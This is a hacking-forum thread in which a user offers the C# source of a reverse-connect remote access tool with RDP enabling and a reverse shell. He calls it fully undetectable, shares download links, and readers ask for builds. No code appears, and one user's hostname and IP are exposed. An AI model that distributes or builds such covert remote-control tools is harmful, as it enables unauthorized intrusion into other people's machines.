New RDP + Reverse Connect RAT c#

oxide
10 years ago

i have created a reverse command prompt remote admin tool that allows you to connect via rdp and enable rdp remotely

100% fud look

i can make this have a specific no-ip or dyddns name this is not for malicious purproses i take no responsibility for what you do with this as i am just making this for educational purposes it is not multi client to make it harder to abuse

27replies
15voices
850views
4images
[IAmDevil]
10 years ago

That looks like something good !!!
Good post !!!;)

oxide
10 years ago

ya it is im now able to make it async bro lol so now i have to work out some more kinks in the code than port the async code to this client as well as the main server and also it has lot of nice functions that will be getting updated this is my first try i barely have a clue how to write these but im trying ill release soon i hope

GB47
10 years ago

Great Work Brother
i like it
can you put the download link

oxide
10 years ago

actually i lost the code in a emergency format but i will redo it no big deal ill do it now

daMage
10 years ago

Any chance you’d share the source or the tool?

oxide
10 years ago

ok i am ready to let this go here you go boys be careful i take no responsibility for what you do with this it is only meant to demistify this process for a new hacker or to have fun in a lab dont use on anyone without permission as this voids any help i will give you not to be rude but i share for knowledge not destruction

oxide
10 years ago | edited 10 years ago

the server in c# visual studio 2010 no exe straight source baby

http://www.megafileupload.com/en/file/430239/ReverseRat-rar.html[/spoiler]

the client that has rdp capability and a reverse command prompt

[spoiler]http://www.megafileupload.com/en/file/430237/rdpratapp-rar.htmll

[d3adMaN]
10 years ago

cool man , I’m gonna take a look at this !!! (gotta learn c# first , :s glup)

oxide
10 years ago

ok links are up you shouldnt have an issue with it now

daMage
10 years ago

Gotta try to remember to have a look at these, when I have some time… thanks for sharing!

oxide
10 years ago

ya they are cool you get a reverse command prompt and can use rdp to connect etc

GB47
10 years ago

ohh brother plz compile it
because i don’t have VB.net

and thanks for sharing

oxide
10 years ago

i cannot do that for a reason unless you give me your ip and the noip name to set it up with and i can do that it will automagicly connect to you when the server is run and make the cdrom open and close alot lol and you get a reverse command prompt

and this is c# not Vb and it will compile just get visual studio 2010 c# and compile it

HOUARIKOILA
10 years ago

I WANT A SOFTWARE FOR HACK A FACEBOOK PLEASE

oxide
10 years ago

i dont condone nor take part in black hat stuff most of us dont plus thats the ultimate noob question facebook is a billion dollar company what are you stalking someone who the fuck hacks facebook accounts that is creepy dude

GB47
10 years ago

this is my no-ip
sysxp.sytes.net
plz compile it

because i can download vb.net 2010 right know

oxide
10 years ago

but your missing my point you need 2 emails set up and if you cant do it yourself i dont feel comfortable doing this for you considering i wrote this i dont need it floating around if you cant use it its simple

oxide
10 years ago

plus looks like u been a bad boy huh

sysxp.sytes.net (41.107.30.141). UDP communications. <MACHINE_DNS_SERVER>:53. Blog | Twitter | | Google groups | ToS | Privacy policy …

dancingriver
10 years ago

Thanks for sharing, very cool

Lord Hack [lordhack]
10 years ago

Is very cool friend. Good work.

aizen2010
10 years ago

How does this thing work?

Alien [StRe1cHeR]
10 years ago

Nice post bro

fr66d0m
9 years ago

Nice tool!!! Pleace if is posible to give me the source, you make me verey very happy!

2 replies have been removed
dadi82
6 years ago

ok Nice tool!!! Pleace if is posible to give me the source, you make me verey very happy!

Smyler [WHGhost]
6 years ago

This post is 5 years old and the thread opener hasn’t connected for 4 years.
Don’t reopen old threads.

solofinnsec
6 years ago

Hey bro give me link you program ? <3

Smyler [WHGhost]
6 years ago | edited 6 years ago

[quote=WHGhost]This post is 5 years old and the thread opener hasn’t connected for 4 years.
Don’t reopen old threads. [/quote]

He won’t answer, @solofinnsec

You must be logged in to reply to this discussion. Login
1 of 28

This site only uses cookies that are essential for the functionality of this website. Cookies are not used for tracking or marketing purposes.

By using our site, you acknowledge that you have read and understand our Privacy Policy, and Terms of Service.

Dismiss